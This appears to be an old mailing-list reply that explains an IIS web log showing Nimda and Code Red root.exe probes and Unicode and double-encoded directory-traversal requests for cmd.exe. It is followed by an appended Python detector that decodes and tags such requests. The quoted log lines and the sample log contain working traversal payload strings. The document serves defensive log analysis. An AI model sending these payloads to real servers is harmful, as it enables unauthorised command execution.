> Hello all and forgive my ignorance in this area.
Hello

> 
> Below is a snippet from the logs.  Can anyone tell by 
> looking at it:
> 
> 1.  What type of vulnerabilities were they looking for?

Look downward.


> 2.  Does the fact the it says <Rejected by urlscan> imply 
> that URLScan from M$
> is loaded.  I didn't do this myself...thats why I'm curious.

I don't really know either.

> 3.  What is the best course of action in regards to the 
> individual attempting
> these activities?  I traced the IP back to RoadRunner.  
> Should I call their
> customer service and complain or am I just pissing in the 
> wind?

You will piss in the wind, I think...

> 4.  I did run the IIS Lockdown wizard.  Is that sufficient 
> for most types of
> attacks?  What other tools should I consider running?

Don't hesitate to apply security patches as soon as they are released!

> 2002-05-10 02:27:00 65.27.56.236 - 10.2.32.20 80 
> GET /<Rejected-By-UrlScan>
> ~/scripts/root.exe 404 123 -

This tests if your IIS has been infected by a virus like Nimda
or Code Red. root.exe is a copy of cmd.exe to give access
to the console via web.

> 2002-05-10 02:27:00 65.27.56.236 - 10.2.32.20 80 
> GET /<Rejected-By-UrlScan>
> ~/MSADC/root.exe 404 123 -

IDEM (I suppose)

> 2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 
> GET /<Rejected-By-UrlScan>
> ~/c/winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 
> GET /<Rejected-By-UrlScan>
> ~/d/winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 

IDEM

> GET /<Rejected-By-UrlScan>
> ~/scripts/..%255c../winnt/system32/cmd.exe 404 123 -

This tests a Unicode vulnerability (the dot-dot attack).
scripts has execute rights, so they try to execute cmd.exe
to access the console via web :)

> 2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 
> GET /<Rejected-By-UrlScan>
> ~/_vti_bin/..%255c../..%255c../..%
> 255c../winnt/system32/cmd.exe 404 123 -

IDEM

> 2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 
> GET /<Rejected-By-UrlScan>
> ~/_mem_bin/..%255c../..%255c../..%
> 255c../winnt/system32/cmd.exe 404 123 -

IDEM

> 2002-05-10 02:27:03 65.27.56.236 - 10.2.32.20 80 
> GET /<Rejected-By-UrlScan>
> ~/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%
> 1c../..%c1%1c../winnt/system32/cmd.exe

IDEM

> 404 123 -
> 2002-05-10 02:27:03 65.27.56.236 - 10.2.32.20 80 
> GET /<Rejected-By-UrlScan>
> ~/scripts/..%c1%1c../winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:04 65.27.56.236 - 10.2.32.20 80 
> GET /<Rejected-By-UrlScan>
> ~/scripts/..%c0%2f../winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:04 65.27.56.236 - 10.2.32.20 80 
> GET /<Rejected-By-UrlScan>
> ~/scripts/..%c0%af../winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:05 65.27.56.236 - 10.2.32.20 80 
> GET /<Rejected-By-UrlScan>
> ~/scripts/..%c1%9c../winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:09 65.27.56.236 - 10.2.32.20 80 
> GET /<Rejected-By-UrlScan>
> ~/scripts/..%%35%63../winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:11 65.27.56.236 - 10.2.32.20 80 
> GET /<Rejected-By-UrlScan>
> ~/scripts/..%%35c../winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:12 65.27.56.236 - 10.2.32.20 80 
> GET /<Rejected-By-UrlScan>
> ~/scripts/..%25%35%63../winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:12 65.27.56.236 - 10.2.32.20 80 
> GET /<Rejected-By-UrlScan>
> ~/scripts/..%252f../winnt/system32/cmd.exe 404 123 -

IDEM for all

> 
> Thanks so much for this great list.
> 
> Craig Brauckmiller
> 
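As an added example (not part of the original thread), here is a small Python normaliser for IIS W3C log lines like the ones quoted above: it pulls the original URL out of UrlScan's `~` query field, decodes it repeatedly (undoing the `%255c` double-encoding) while emulating the lenient two-byte UTF-8 handling that let `%c0%af` and `%c1%1c` act as path separators, and tags root.exe probes and dot-dot requests for cmd.exe. The sample log lines are constructed, and the tag names and the emulation of the old IIS decoder are my assumptions, not anything from the thread.

```python
import re

SAMPLE_LOG = """\
2002-05-10 02:27:00 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/root.exe 404 123 -
2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%255c../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:28:00 10.2.32.99 - 10.2.32.20 80 GET /index.htm - 200 4512 -
"""  # constructed W3C-format lines modelled on the entries quoted in the thread
HEX = re.compile(r"%([0-9A-Fa-f]{2})")

def decode_once(path):
    """One percent-decoding pass that emulates the unpatched IIS decoder's lenient UTF-8."""
    out, lead, i = bytearray(), None, 0
    while i < len(path):
        m = HEX.match(path, i)
        b = int(m.group(1), 16) if m else ord(path[i]) & 0xFF
        i += 3 if m else 1
        if lead is not None:  # fold lead + next byte: %c0%af -> '/', %c1%1c and %c1%9c -> '\'
            out.append(((lead & 0x1F) << 6) | (b & 0x3F))
            lead = None
        elif b in (0xC0, 0xC1):  # overlong two-byte lead; valid UTF-8 never uses these
            lead = b
        else:
            out.append(b)
    out.extend([] if lead is None else [lead])  # a dangling lead byte is kept as-is
    return out.decode("latin-1")

def canonicalize(path, max_rounds=3):
    """Decode until stable (undoes %255c -> %5c -> '\\', the double-decode trick), unify slashes."""
    for _ in range(max_rounds):
        decoded = decode_once(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/").lower()

def classify(line):
    """Return a finding for a suspicious W3C log line, or None when it looks clean."""
    f = line.split()
    if len(f) < 10:
        return None
    stem, query = f[7], f[8]
    # UrlScan logs the rejected stem as '/<Rejected-By-UrlScan>' and the original URL, prefixed '~', as the query
    path = query[1:] if stem == "/<Rejected-By-UrlScan>" and query.startswith("~") else stem
    canon = canonicalize(path)
    tags = []
    if canon.endswith("/root.exe"):
        tags.append("worm-backdoor-probe")  # cmd.exe copy left behind by Code Red II / Nimda
    if ".." in canon.split("/") and canon.endswith("/cmd.exe"):
        tags.append("encoded-traversal-to-cmd")  # Unicode / double-decode "dot dot" attack
    return {"client": f[2], "status": f[9], "path": path, "canonical": canon, "tags": tags} if tags else None
```

Running `classify` over each line of `SAMPLE_LOG` flags the first two entries and leaves the ordinary `/index.htm` hit alone; all the encodings quoted in the thread canonicalise to the same `/scripts/../../winnt/system32/cmd.exe`.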
